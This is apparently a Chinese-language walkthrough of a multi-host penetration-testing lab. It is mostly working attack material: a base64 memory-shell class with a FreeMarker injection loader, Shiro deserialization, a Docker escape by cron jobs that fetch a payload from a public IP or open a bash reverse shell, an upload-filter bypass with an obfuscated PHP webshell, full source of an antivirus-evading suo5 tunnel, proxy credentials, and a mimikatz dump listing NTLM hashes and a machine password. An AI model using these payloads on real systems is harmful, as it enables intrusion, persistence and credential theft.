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

这是我生成的冰蝎内存马:

将编码后的内存马插入其中:

1
{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};

这里利用漏洞利用工具不能自动化打入内存马,于是自己尝试进行手工注入:

成功打入冰蝎内存马以后:

成功连接如下图:

10.10.0.3-Shiro 反序列化

http://10.10.0.3:18080/

成功拿到webshell以后发现有些命令没有,直接进行下一步的信息收集:

发现了DocToolkit 的源码,然后脱下来反编译

利用jadx工具将jar包反编译:

翻阅成功获得shiro密钥

1
QZIysgMYhG7/CzIJlVpR1g==

打开one-fox内置的shiro反序列化利用工具

检测成功:

命令执行一手:

注入内存马:

192.168.80.50-Docker容器逃逸

可看的相关文章:

https://xz.aliyun.com/t/12495?time__1311=GqGxRQq7qeuDlrzQ0%3DGOjqLb%3DAKKG8IeD

上传了一波fscan对内网进行了一番扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[*] LiveTop 172.18.0.0/16    段存活数量为: 2
[*] LiveTop 172.18.0.0/24    段存活数量为: 2
172.18.0.1:22 open
172.18.0.2:8080 open
172.18.0.1:6379 open
172.18.0.1:3306 open
172.18.0.1:18080 open
172.18.0.1:18088 open
[*] WebTitle http://172.18.0.2:8080    code:200 len:1120   title:DocToolkit
[*] WebTitle http://172.18.0.1:18088   code:404 len:682    title:HTTP Status 404 – Not Found
[*] WebTitle http://172.18.0.1:18080   code:200 len:1120   title:DocToolkit
[+] mysql 172.18.0.1:3306:root root
[+] Redis 172.18.0.1:6379 unauthorized file:/data/dump.rdb

感觉有一些不对劲,怀疑是在docker容器内:

find / -name .dockerenv

发现确实存在!!

df -h发现(查看文件系统信息)

基本确定就是在docker里面。

逃逸docker容器常用方法

  • 内核漏洞:由于docker容器与物理机共享一个内核,当该内核存在内核漏洞时,在docker容器内利用内核漏洞可能直接获得物理机权限
  • Docker API 未授权访问漏洞:当物理机的Docker API开启并同意未授权访问时,在Docker容器内可以使用Docker API新建一个Docker容器,并将物理机的根目录挂载到新Docker容器的某目录下。
  • Docker容器以特权模式启动:当Docker容器以特权模式启动时,可以使用mount命令将物理机的根目录挂在道当前Docker容器的某目录下。

用CDK工具检测docker容器是否有不安全的配置或漏洞存在

CDK地址:https://github.com/cdk-team/CDK

查询cgroup进程:可以看出来就是docker环境了

查看容器环境变量:非docker环境下是默认没有输出的,再次确认是docker环境下

1
/proc/1/environ

内容如下:

1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/binHOSTNAME=25313452973fFLAG=flag{N1c3_sHirO_fuCK}LANG=C.UTF-8JAVA_HOME=/usr/lib/jvm/java-1.8-openjdkJAVA_VERSION=8u212JAVA_ALPINE_VERSION=8.212.04-r0HOME=/rootLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjdk/jre/../lib/amd64

上传cdk工具进行查询结果如下:

1
2
chmod +x /tmp/cdk_linux_amd64
/tmp/cdk_linux_amd64 evaluate --full

不过好像并无卵用,又或者说我还不太会用哈哈哈哈。

经过一番翻阅:

发现了挂载目录:/dev/tmp

发现挂载的是宿主机的目录

我们会发现其真实机的目录内容就在我们的这个docker容器内:所以往这个目录传即可:

挂载进行定时任务逃逸

1
echo "*/1 * * * * root wget http://公网ip:9999/icon_54321.elf -o /tmp/qwert1234" > /dev/tmp/etc/cron.d/sysstat
1
echo "*/1 * * * * root chmod 755 /tmp/qwert1234" > /dev/tmp/etc/cron.d/sysstat
1
echo "*/1 * * * * root /tmp/qwert1234" > /dev/tmp/etc/cron.d/sysstat

或者挂载进行定时任务反弹shell

1
echo '*/1 * * * * root bash -c "bash -i >& /dev/tcp/公网IP/9999 0>&1" ' > /dev/tmp/etc/cron.d/sysstat

等待一分钟 就收到shell了

当然你也可以直接在这里写一个shell脚本然后利用定时任务进行逃逸如下:不做过多演示。

成功反弹shell以后:我们发现了其的真实网卡:

逃逸到主机以后利用venom工具先快捷搭建一个代理将自己代理进内网网段192.168.80.50/24

192.168.80.55-文件上传绕WAF

上传工具:fscan,chfs工具,利用fscan对其内网进行扫描

发现一台内网主机:192.168.80.55并且其开放了80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
./fscan -h 192.168.80.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.80.50   is alive
(icmp) Target 192.168.80.55   is alive
[*] Icmp alive hosts len is: 2
192.168.80.50:22 open
192.168.80.55:139 open
192.168.80.55:135 open
192.168.80.55:80 open
192.168.80.50:80 open
192.168.80.50:6379 open
192.168.80.50:3306 open
192.168.80.55:445 open
192.168.80.50:18088 open
192.168.80.50:18080 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://192.168.80.50      code:200 len:9483   title:None
[*] NetBios 192.168.80.55   WORKGROUP\WIN-P5VV23D2I7P           Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle http://192.168.80.55      code:200 len:11     title:None
[*] OsInfo 192.168.80.55        (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] WebTitle http://192.168.80.50:18088 code:404 len:682    title:HTTP Status 404 – Not Found
[+] mysql 192.168.80.50:3306:root root
[*] WebTitle http://192.168.80.50:18080 code:200 len:1120   title:DocToolkit
[+] Redis 192.168.80.50:6379 unauthorized file:/data/dump.rdb

成功挂入内网:

对其进行一手目录扫描:将扫描结果导出excel表格,发现敏感路径:/web.php

这是一个文件上传的点:

经过一番测试,其是黑名单限制,不准许php后缀文件上传,并且对文件内容有限制,限制了一些敏感函数之类。

尝试上传.htaccess

1
2
3
<FilesMatch "a.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

尝试免杀webshell

1
2
3
4
5
6
<?php
$a='assert';
$b='_GET';
$c=$$b;
$a($c['id']);
?>

之所以利用$_GET['id'],是你利用assert($_POST[1])是无法直接利用蚁剑连接,它的是eval($_POST[1])才可以直接利用蚁剑连接。于是我直接利用assert($_GET['id'])做一个转接口就可以成功连接蚁剑:如下

挂上代理成功连接!

查询其相关进程:

发现开启了火绒环境!

在这一层我一开始的是尝试用的venom来搭建多级代理的,但是很显然直接,被kill掉了,我看别的师傅的wp是通过传入stowaway来搭建的多级代理,我觉得可能是因为其一直维护到现在,相对来说比较新火绒没有对其进行拦截kill,但是这里我是通过免杀suo5直接搭建隧道到192.168.81.22网段。

免杀代码如下:

suo.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
<?php
error_reporting(E_ERROR | E_PARSE);
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
ini_set("allow_url_fopen", true);
ini_set("allow_url_include", true);
ini_set('always_populate_raw_post_data', -1);

// bypass session lock
ini_set('session.use_only_cookies', false);
ini_set('session.use_cookies', false);
ini_set('session.use_trans_sid', false);
ini_set('session.cache_limiter', null);
if (array_key_exists('PHPSESSID', $_COOKIE)) {
    session_id($_COOKIE['PHPSESSID']);
} else {
    session_start();
    setcookie('PHPSESSID', session_id());
    session_write_close();
}

// disable output buffering
@ini_set('zlib.output_compression', 0);
ob_implicit_flush(true);
while (ob_get_level()) {
    ob_end_clean();
}

if (version_compare(PHP_VERSION, '5.4.0', '>=')) @http_response_code(200);

function xlpassxpukcLmU()
{
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    if ($ua != 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3') {
        return false;
    }
    if ($_SERVER['CONTENT_TYPE'] == 'application/plain') {
        $read_data = file_get_contents('php://input', 0, null, 0, 32);
        echo $read_data;
        return false;
    }
    return true;
}

function xlpassOEgojXTR($client_id, $data)
{
    $exist = false;
    session_start();
    if (isset($_SESSION[$client_id . '_ok'])) {
        $exist = true;
        $_SESSION[$client_id . '_buf'] .= $data;
    }
    session_write_close();
    return $exist;
}


function xlpassHvUNfPam($client_id)
{
    session_start();
    if (isset($_SESSION[$client_id . '_ok'])) {
        $_SESSION[$client_id . '_ok'] = false;
    };
    session_write_close();
}

function xlpassCgPzfQOO($client_id)
{
    session_start();
    $_SESSION[$client_id . '_buf'] = '';
    $_SESSION[$client_id . '_ok'] = true;
    session_write_close();
}

function xlpassEtbOsRDk()
{
    $body = file_get_contents('php://input');
    $data_map = xlpassxZHdjSBv($body);
    $client_id = $data_map['id'];
    $actions = $data_map['ac'];
    if (strlen($actions) != 1) return;
    $action = ord($actions[0]);

    if ($action == 0x02) {
        xlpassHvUNfPam($client_id);
        return;
    } elseif ($action == 0x01) {
        $exist = xlpassOEgojXTR($client_id, $data_map['dt']);
        if (!$exist) {
            echo xlpassGSuTOKsO(new_del());
        }
        return;
    }

    if ($action != 0x00) return;
    header('X-Accel-Buffering: no');
    header('Content-Type: application/octet-stream');
    header("Connection: Keep-Alive");
    set_time_limit(0);

    $host = $data_map['h'];
    $ip = gethostbyname($host);
    $port_str = trim($data_map['p']);
    if ($port_str == '0') {
        $port_str = isset($_SERVER['SERVER_PORT']) ? $_SERVER['SERVER_PORT'] : '80';
    }
    $port = intval($port_str);

    $remote_sock = @fsockopen($ip, $port, $errno, $errstr, 3);
    if ($remote_sock) {
        stream_set_blocking($remote_sock, false);
//        ignore_user_abort(true);
        $read_from = $remote_sock;
        xlpassCgPzfQOO($client_id);
        echo xlpassGSuTOKsO(new_status(0x00));
    } else {
        echo xlpassGSuTOKsO(new_status(0x01));
        return;
    }

    $ok_key = $client_id . '_ok';
    $buf_key = $client_id . '_buf';

    $last_buf_time = time();
    while (!feof($read_from)) {
        $remote_data = fread($read_from, 32 * 1024);
        if ($remote_data === false) {
            break;
        }
        if (strlen($remote_data) !== 0) {
            echo xlpassGSuTOKsO(new_data($remote_data));
        }

        session_start();
        if (!isset($_SESSION[$ok_key]) || $_SESSION[$ok_key] !== true) {
            unset($_SESSION[$ok_key]);
            unset($_SESSION[$buf_key]);
            session_write_close();
            break;
        }
        if (strlen($_SESSION[$buf_key]) !== 0) {
            $last_buf_time = time();
            fwrite($read_from, $_SESSION[$buf_key]);
            $_SESSION[$buf_key] = '';
        }

        // compute client count
        $client_count = 0;
        foreach ($_SESSION as $key => $value) {
            if (substr($key, -3) == '_ok') {
                $client_count++;
            }
        }
        session_write_close();

        if (time() - $last_buf_time > 60) {
            break;
        }
        usleep(50000);
    }

    session_start();
    unset($_SESSION[$ok_key]);
    unset($_SESSION[$buf_key]);
    session_write_close();
    fclose($read_from);
    echo xlpassGSuTOKsO(new_del());
}

function xlpassGSuTOKsO($m)
{
    $buf = '';
    foreach ($m as $key => $value) {
        $buf .= chr(strlen($key)) . $key . pack('N', strlen($value)) . $value;
    }
    $xor_key = chr(mt_rand(0, 255));
    $data = '';
    for ($i = 0; $i < strlen($buf); $i++) {
        $data .= chr(ord($buf[$i]) ^ ord($xor_key));
    }
    return pack('N', strlen($data)) . $xor_key . $data;
}

function xlpassxZHdjSBv($body)
{
    $len = unpack('N', substr($body, 0, 4))[1];
    $xor = ord(substr($body, 4, 1));
    $data = substr($body, 5);
    if ($len > 1024 * 1024 * 32) {
        throw new Exception('invalid len');
    }
    if (strlen($data) != $len) {
        throw new Exception('invalid data');
    }
    $decoded = '';
    for ($i = 0; $i < strlen($data); $i++) {
        $decoded .= chr(ord($data[$i]) ^ $xor);
    }
    $m = array();
    $i = 0;
    while ($i < strlen($decoded) - 1) {
        $k_len = ord($decoded[$i]);
        $i++;
        if ($k_len < 0 || $i + $k_len >= strlen($decoded)) break;
        $key = substr($decoded, $i, $k_len);
        $i += $k_len;
        if ($i + 4 >= strlen($decoded)) break;
        $v_len = unpack('N', substr($decoded, $i, 4))[1];
        $i += 4;
        if ($v_len < 0 || $i + $v_len > strlen($decoded)) break;
        $value = substr($decoded, $i, $v_len);
        $i += $v_len;
        $m[$key] = $value;
    }
    return $m;
}

function new_del()
{
    return array('ac' => chr(0x02));
}

function new_status($b)
{
    return array('s' => chr($b));
}

function new_data($data)
{
    return array('ac' => chr(0x01), 'dt' => $data);
}

if (xlpassxpukcLmU()) {
    try {
        xlpassEtbOsRDk();
    } catch (Exception $ex) {
    }
}

本地直接起了一个suo5客户端,直接通过http搭建了两个内网之间的隧道,而且通过了解可知,这个隧道的传输质量也是不错的

首先将代理写好如下:

1
socks5://用户名:密码@公网IP:端口

成功搭建如下:

linux代理:

1
2
./suo5-linux-amd64 -t http://192.168.80.55/uploads/suo.php -l 0.0.0.0:7788 --proxy socks5://admin:ikvDbHGO@42.193.105.220:42584

借助这个代理可以成功访问:192.168.81.0/24网段

到达:http://192.168.81.20:7001

这里耐心等待:利用命令行启动java程序让其走,socks代理:socks5://127.0.0.1:1080

1
2
G:\all_tools\One-fox\ONE-FOX集成工具箱_V8.2公开版_by狐狸\Java_path\Java_8_win\bin\java.exe -DsocksProxyHost=127.0.0.1
-DsocksProxyPort=1080 -jar WeblogicTool_1.3.jar

可参考文章:第12篇:给任意java程序挂Socks5代理方法_java socks5-CSDN博客

192.168.81.22-weblogic

检测到如下漏洞:如下

尝试一把梭,打入内存马

1
2
2024-12-12 10:37:04:哥斯拉4 Servlet内存马Payload已发送,请自行测试!
URL: http://192.168.81.20:7001/bea_wls_internal/app   密码:123456  秘钥:key

最后一直没能成功,具体原因不太清楚(决定后面再仔细研究)。后面改用stowaway来搭建多级代理,因为其火绒相对来说版本比较老,所以能达到一个过火绒的效果。

步骤如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
公网ip上启动一个监听:
./stowaway_admin -l 9999

192.168.80.55回连监听连通:
./stowaway_agent -c 公网ip:9999

建立连接以后如果想要使用这个节点就使用命令:
(admin)>use 0

192.168.80.55启动一个监听:
stowaway_admin.exe -l 9999

然后在节点0:
主动连接192.168.80.55:9999
(node 0)> connect 192.168.80.55:9999

成功连接以后
(node 0)> back
退出0节点回到(admin)

进入节点1
(admin)>use 1

开启一个socks代理
(node 1)>socks 1080

这个代理成功之后是能够通过cve成功写入内存马的:

挂上代理成功连接:

拿到webshell以后,查询一下进程:

发现并没有杀软:

查看ip信息发现了一个新网段192.168.77.0/24

因为其权限给的是administrator直接利用哥斯拉内置的mimikatz来进行密码凭据抓取

1
"privilege::debug" "sekurlsa::logonpasswords" "exit" 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
ok

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 375046 (00000000:0005b906)
Session           : Interactive from 2
User Name         : weblogic
Domain            : C3TING
Logon Server      : WIN-1SJG2BFF54E
Logon Time        : 2024/6/10 21:31:50
SID               : S-1-5-21-495363149-4124706654-1579529781-1103
	msv :	
	 [00000003] Primary
	 * Username : weblogic
	 * Domain   : C3TING
	 * NTLM     : dee6489dfcd545e5a4b452fc9da06a0f
	 * SHA1     : f959b907a86ef967bcbed9dc24954695ecbe2fa8
	 [00010000] CredentialKeys
	 * NTLM     : dee6489dfcd545e5a4b452fc9da06a0f
	 * SHA1     : f959b907a86ef967bcbed9dc24954695ecbe2fa8
	tspkg :	
	wdigest :	
	 * Username : weblogic
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : weblogic
	 * Domain   : C3TING.ORG
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 350972 (00000000:00055afc)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/6/10 21:29:25
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * NTLM     : 46b27275c57726a026781f3ed621b4cb
	 * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
	tspkg :	
	wdigest :	
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : WEBLOGIC$
	 * Domain   : c3ting.org
	 * Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
	ssp :	KO
	credman :	

Authentication Id : 0 ; 350948 (00000000:00055ae4)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/6/10 21:29:25
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * NTLM     : 46b27275c57726a026781f3ed621b4cb
	 * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
	tspkg :	
	wdigest :	
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : WEBLOGIC$
	 * Domain   : c3ting.org
	 * Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
	ssp :	KO
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEBLOGIC$
Domain            : C3TING
Logon Server      : (null)
Logon Time        : 2024/6/10 21:26:59
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * NTLM     : 46b27275c57726a026781f3ed621b4cb
	 * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
	tspkg :	
	wdigest :	
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : weblogic$
	 * Domain   : C3TING.ORG
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 43688 (00000000:0000aaa8)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/6/10 21:26:53
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WEBLOGIC$
	 * Domain   : C3TING
	 * NTLM     : 46b27275c57726a026781f3ed621b4cb
	 * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 538497 (00000000:00083781)
Session           : CachedInteractive from 2
User Name         : Administrator
Domain            : C3TING
Logon Server      : WIN-1SJG2BFF54E
Logon Time        : 2024/6/10 21:33:21
SID               : S-1-5-21-495363149-4124706654-1579529781-500
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : 7ab183888ecafcccf897c4a5a59c8568
	 * SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : C3TING
	 * NTLM     : 7ab183888ecafcccf897c4a5a59c8568
	 * SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : C3TING.ORG
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 496531 (00000000:00079393)
Session           : Interactive from 2
User Name         : Administrator
Domain            : C3TING
Logon Server      : WIN-1SJG2BFF54E
Logon Time        : 2024/6/10 21:32:46
SID               : S-1-5-21-495363149-4124706654-1579529781-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : C3TING
	 * NTLM     : 7ab183888ecafcccf897c4a5a59c8568
	 * SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
	 [00010000] CredentialKeys
	 * NTLM     : 7ab183888ecafcccf897c4a5a59c8568
	 * SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : C3TING
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : C3TING.ORG
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 264033 (00000000:00040761)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WEBLOGIC
Logon Server      : WEBLOGIC
Logon Time        : 2024/6/10 21:28:30
SID               : S-1-5-21-2004965046-3923418856-647414055-500
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/6/10 21:27:01
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	KO
	credman :	

